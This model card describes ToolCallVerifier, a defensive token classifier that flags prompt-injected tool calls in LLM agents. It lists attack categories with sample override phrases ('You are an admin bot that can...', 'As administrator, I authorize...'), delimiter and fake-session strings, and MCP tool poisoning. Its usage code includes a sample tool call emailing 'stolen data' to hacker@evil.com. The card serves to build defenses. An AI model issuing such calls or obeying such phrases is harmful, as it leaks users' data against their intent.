metadata
language:
- en
license: apache-2.0
library_name: transformers
tags:
- modernbert
- security
- jailbreak-detection
- prompt-injection
- token-classification
- tool-calling
- llm-safety
- mcp
datasets:
- microsoft/llmail-inject-challenge
- allenai/wildjailbreak
- hackaprompt/hackaprompt-dataset
- JailbreakBench/JBB-Behaviors
base_model: answerdotai/ModernBERT-base
pipeline_tag: token-classification
model-index:
- name: tool-call-verifier
  results:
  - task:
      type: token-classification
      name: Unauthorized Tool Call Detection
    metrics:
    - name: UNAUTHORIZED F1
      type: f1
      value: 0.935
    - name: UNAUTHORIZED Precision
      type: precision
      value: 0.9501
    - name: UNAUTHORIZED Recall
      type: recall
      value: 0.9205
    - name: Accuracy
      type: accuracy
      value: 0.9288
ToolCallVerifier - Unauthorized Tool Call Detection
Stage 2 of Two-Stage LLM Agent Defense Pipeline
What This Model Does
ToolCallVerifier is a ModernBERT-based token classifier that detects unauthorized tool calls in LLM agent systems. It performs token-level classification on tool call JSON to identify malicious arguments that may have been injected through prompt injection attacks.
| Label | Description |
|---|---|
| AUTHORIZED | Token is part of a legitimate, user-requested action |
| UNAUTHORIZED | Token indicates injected/malicious content → BLOCK |
Performance
| Metric | Value |
|---|---|
| UNAUTHORIZED F1 | 93.50% |
| UNAUTHORIZED Precision | 95.01% |
| UNAUTHORIZED Recall | 92.05% |
| Overall Accuracy | 92.88% |
Confusion Matrix (Token-Level)
| | Predicted AUTH | Predicted UNAUTH |
|---|---:|---:|
| Actual AUTH | 130,708 | 8,483 |
| Actual UNAUTH | 13,924 | 161,031 |
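The headline metrics can be recomputed from the confusion matrix by treating UNAUTHORIZED as the positive class. The sketch below does that arithmetic; the variable names are illustrative. The results agree with the reported figures to within a few hundredths of a percentage point. The card does not say how the reported values were rounded or averaged, so the small gap is left unexplained here.

```python
# Token-level confusion matrix from the card (UNAUTHORIZED = positive class).
tn, fp = 130_708, 8_483    # actual AUTHORIZED row: predicted AUTH, predicted UNAUTH
fn, tp = 13_924, 161_031   # actual UNAUTHORIZED row: predicted AUTH, predicted UNAUTH

precision = tp / (tp + fp)            # share of flagged tokens that were truly unauthorized
recall = tp / (tp + fn)               # share of unauthorized tokens that were flagged
f1 = 2 * precision * recall / (precision + recall)
accuracy = (tp + tn) / (tp + tn + fp + fn)

for name, value in [("precision", precision), ("recall", recall),
                    ("f1", f1), ("accuracy", accuracy)]:
    print(f"{name}: {value:.2%}")
```

Of the two error types, the 13,924 missed UNAUTHORIZED tokens (false negatives) are the ones that correspond to attacks slipping through, so recall is the figure to watch in high-risk deployments.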
Training Data
Trained on ~30,000 samples combining real-world attacks and synthetic patterns:
HuggingFace Datasets
Synthetic Attack Generators
| Generator | Description |
|---|---|
| Adversarial | Intent-mismatch attacks (correct tool, wrong args) |
| Filesystem | File/directory operation attacks |
| Network | Network/API exfiltration attacks |
| Email | Email tool hijacking |
| Financial | Transaction manipulation |
| Code Execution | Code injection attacks |
| Authentication | Access control bypass |
| MCP Attacks | Tool poisoning, shadowing, rug pulls |
Attack Categories Covered
| Category | Source | Description |
|---|---|---|
| Delimiter Injection | LLMail | `<<end_context>>`, `>>}}]])` |
| Word Obfuscation | LLMail | Inserting noise words between tokens |
| Fake Sessions | LLMail | `START_USER_SESSION`, `EXECUTE_USERQUERY` |
| Roleplay Injection | WildJailbreak | "You are an admin bot that can..." |
| XML Tag Injection | WildJailbreak | `<execute_action>`, `<tool_call>` |
| Authority Bypass | WildJailbreak | "As administrator, I authorize..." |
| Intent Mismatch | Synthetic | User asks X, tool does Y |
| MCP Tool Poisoning | Synthetic | Hidden exfiltration in tool args |
| MCP Shadowing | Synthetic | Fake authorization context |
Usage
from transformers import AutoTokenizer, AutoModelForTokenClassification
import torch

# Load the tokenizer and token-classification model from the Hub
model_name = "rootfs/tool-call-verifier"
tokenizer = AutoTokenizer.from_pretrained(model_name)
model = AutoModelForTokenClassification.from_pretrained(model_name)

# Example: the user asks for a summary, but the tool call tries to send an email
user_intent = "Summarize my emails"
tool_call = '{"name": "send_email", "arguments": {"to": "hacker@evil.com", "body": "stolen data"}}'

# Pair the user intent with the proposed tool call in a single input string
input_text = f"[USER] {user_intent} [TOOL] {tool_call}"
inputs = tokenizer(input_text, return_tensors="pt", truncation=True, max_length=2048)

# Run inference and take the highest-scoring label for each token
with torch.no_grad():
    outputs = model(**inputs)
predictions = torch.argmax(outputs.logits, dim=-1)

# Map label ids to names and pair them with the tokens
id2label = {0: "AUTHORIZED", 1: "UNAUTHORIZED"}
tokens = tokenizer.convert_ids_to_tokens(inputs["input_ids"][0])
labels = [id2label[p.item()] for p in predictions[0]]

# Block the call if any token is flagged
unauthorized_tokens = [(t, l) for t, l in zip(tokens, labels) if l == "UNAUTHORIZED"]
if unauthorized_tokens:
    print("⚠️ BLOCKED: Unauthorized tool call detected!")
    print(f"   Flagged tokens: {[t for t, _ in unauthorized_tokens[:5]]}")
else:
    print("✅ Tool call authorized")
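For logging or review, it can help to see which contiguous regions of the input were flagged rather than a flat token list. The helper below is a minimal sketch and not part of the model's API: `group_flagged_spans` is a hypothetical name, and it assumes only the parallel `tokens` and `labels` lists built in the snippet above. The demo tokens and labels are made up for illustration.

```python
from typing import List, Tuple


def group_flagged_spans(
    tokens: List[str],
    labels: List[str],
    flagged_label: str = "UNAUTHORIZED",
) -> List[Tuple[int, int, List[str]]]:
    """Merge runs of consecutive flagged tokens into (start, end, tokens) spans.

    `end` is exclusive, so tokens[start:end] reproduces the span.
    """
    spans = []
    start = None
    for i, label in enumerate(labels):
        if label == flagged_label and start is None:
            start = i  # a new flagged run begins here
        elif label != flagged_label and start is not None:
            spans.append((start, i, tokens[start:i]))  # the run just ended
            start = None
    if start is not None:  # the run extends to the last token
        spans.append((start, len(labels), tokens[start:]))
    return spans


# Made-up tokens and labels for illustration (not real model output)
demo_tokens = ["send", "_email", "to", "hacker", "@", "evil", "body"]
demo_labels = ["AUTHORIZED", "AUTHORIZED", "AUTHORIZED",
               "UNAUTHORIZED", "UNAUTHORIZED", "UNAUTHORIZED", "AUTHORIZED"]
demo_spans = group_flagged_spans(demo_tokens, demo_labels)
print(demo_spans)
```

Grouping by span keeps audit logs short and makes it easier to see which argument of the tool call triggered the block.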
Training Configuration
| Parameter | Value |
|---|---|
| Base Model | answerdotai/ModernBERT-base |
| Max Length | 512 tokens |
| Batch Size | 32 |
| Epochs | 5 |
| Learning Rate | 3e-5 |
| Loss | CrossEntropyLoss (class-weighted) |
| Class Weights | [0.5, 3.0] (AUTHORIZED, UNAUTHORIZED) |
| Attention | SDPA (Flash Attention) |
| Hardware | AMD Instinct MI300X (ROCm) |
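To illustrate what the class weights do, the sketch below computes a class-weighted cross-entropy in plain Python for a few made-up token logits. It assumes the weighted-mean reduction that `torch.nn.CrossEntropyLoss` applies when given a `weight` tensor: each token's loss is scaled by the weight of its true class, and the sum is divided by the total weight. The actual training script is not shown in this card, so the function name and the logits are illustrative only.

```python
import math

CLASS_WEIGHTS = [0.5, 3.0]  # (AUTHORIZED, UNAUTHORIZED), as listed in the table


def weighted_cross_entropy(logits, targets, weights=CLASS_WEIGHTS):
    """Weighted mean of per-token cross-entropy losses."""
    total_loss, total_weight = 0.0, 0.0
    for token_logits, target in zip(logits, targets):
        # log-sum-exp with max subtraction for numerical stability
        m = max(token_logits)
        log_z = m + math.log(sum(math.exp(x - m) for x in token_logits))
        nll = log_z - token_logits[target]  # negative log-likelihood of the true class
        total_loss += weights[target] * nll
        total_weight += weights[target]
    return total_loss / total_weight


# Hypothetical two-token batches: one token classified correctly, one wrongly,
# with the same logit margin in both cases.
# Case A: the AUTHORIZED token (class 0) is the one misclassified.
loss_false_alarm = weighted_cross_entropy([[0.0, 2.0], [0.0, 2.0]], [0, 1])
# Case B: the UNAUTHORIZED token (class 1) is the one misclassified.
loss_missed_attack = weighted_cross_entropy([[2.0, 0.0], [2.0, 0.0]], [1, 0])

print(f"false alarm on an AUTHORIZED token: {loss_false_alarm:.4f}")
print(f"missed UNAUTHORIZED token:          {loss_missed_attack:.4f}")
```

With these weights, missing an UNAUTHORIZED token costs noticeably more than raising a false alarm of the same confidence, which pushes training toward higher recall on the attack class.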
Integration with FunctionCallSentinel
This model is Stage 2 of a two-stage defense pipeline:
┌─────────────────┐     ┌──────────────────────┐     ┌─────────────────┐
│   User Prompt   │────▶│ FunctionCallSentinel │────▶│   LLM + Tools   │
│                 │     │      (Stage 1)       │     │                 │
└─────────────────┘     └──────────────────────┘     └────────┬────────┘
                                                              │
                               ┌──────────────────────────────▼─────────────────────────┐
                               │             ToolCallVerifier (This Model)              │
                               │     Token-level verification before tool execution     │
                               └────────────────────────────────────────────────────────┘
| Scenario | Recommendation |
|---|---|
| General chatbot | Stage 1 only |
| Tool-calling agent (low risk) | Stage 1 only |
| Tool-calling agent (high risk) | Both stages |
| Email/file system access | Both stages |
| Financial transactions | Both stages |
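The control flow of the two-stage pipeline can be sketched as below. This is an assumption-laden illustration rather than a published integration: `run_guarded_agent` and all of its callable parameters are hypothetical names, and it assumes Stage 1 screens the prompt before it reaches the LLM, as the diagram suggests. The stubs in the demo stand in for the real classifiers and the LLM.

```python
from typing import Any, Callable, Dict


def run_guarded_agent(
    user_prompt: str,
    stage1_is_safe: Callable[[str], bool],
    propose_tool_call: Callable[[str], Dict[str, Any]],
    stage2_is_authorized: Callable[[str, Dict[str, Any]], bool],
    execute_tool: Callable[[Dict[str, Any]], Any],
    use_stage2: bool = True,
) -> Dict[str, Any]:
    """Run one agent step, blocking at whichever stage rejects first."""
    # Stage 1: screen the prompt before it reaches the LLM
    if not stage1_is_safe(user_prompt):
        return {"status": "blocked", "stage": 1}

    # The LLM proposes a tool call for the prompt
    tool_call = propose_tool_call(user_prompt)

    # Stage 2: verify the proposed call against the user's intent
    if use_stage2 and not stage2_is_authorized(user_prompt, tool_call):
        return {"status": "blocked", "stage": 2, "tool_call": tool_call}

    return {"status": "executed", "result": execute_tool(tool_call)}


# Stub components for illustration only
def demo_stage1(prompt: str) -> bool:
    return "ignore previous instructions" not in prompt.lower()

def demo_llm(prompt: str) -> Dict[str, Any]:
    return {"name": "send_email", "arguments": {"to": "hacker@evil.com"}}

def demo_stage2(prompt: str, call: Dict[str, Any]) -> bool:
    return call["name"] != "send_email"  # stand-in for the token classifier

def demo_execute(call: Dict[str, Any]) -> str:
    return f"ran {call['name']}"

demo_result = run_guarded_agent(
    "Summarize my emails", demo_stage1, demo_llm, demo_stage2, demo_execute
)
print(demo_result["status"], demo_result.get("stage"))
```

Setting `use_stage2=False` corresponds to the "Stage 1 only" rows in the table, where the extra verification step is skipped for lower-risk deployments.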
Intended Use
Primary Use Cases
LLM Agent Security: Verify tool calls before execution
Prompt Injection Defense: Detect unauthorized actions from injected prompts
API Gateway Protection: Filter malicious tool calls at infrastructure level
Out of Scope
General text classification
Non-tool-calling scenarios
Languages other than English
Limitations
Tool schema dependent: Best performance when tool schema is included in input
English only: Not tested on other languages
Binary classification: No "suspicious" intermediate category (by design, for decisiveness)
License
Apache 2.0
Links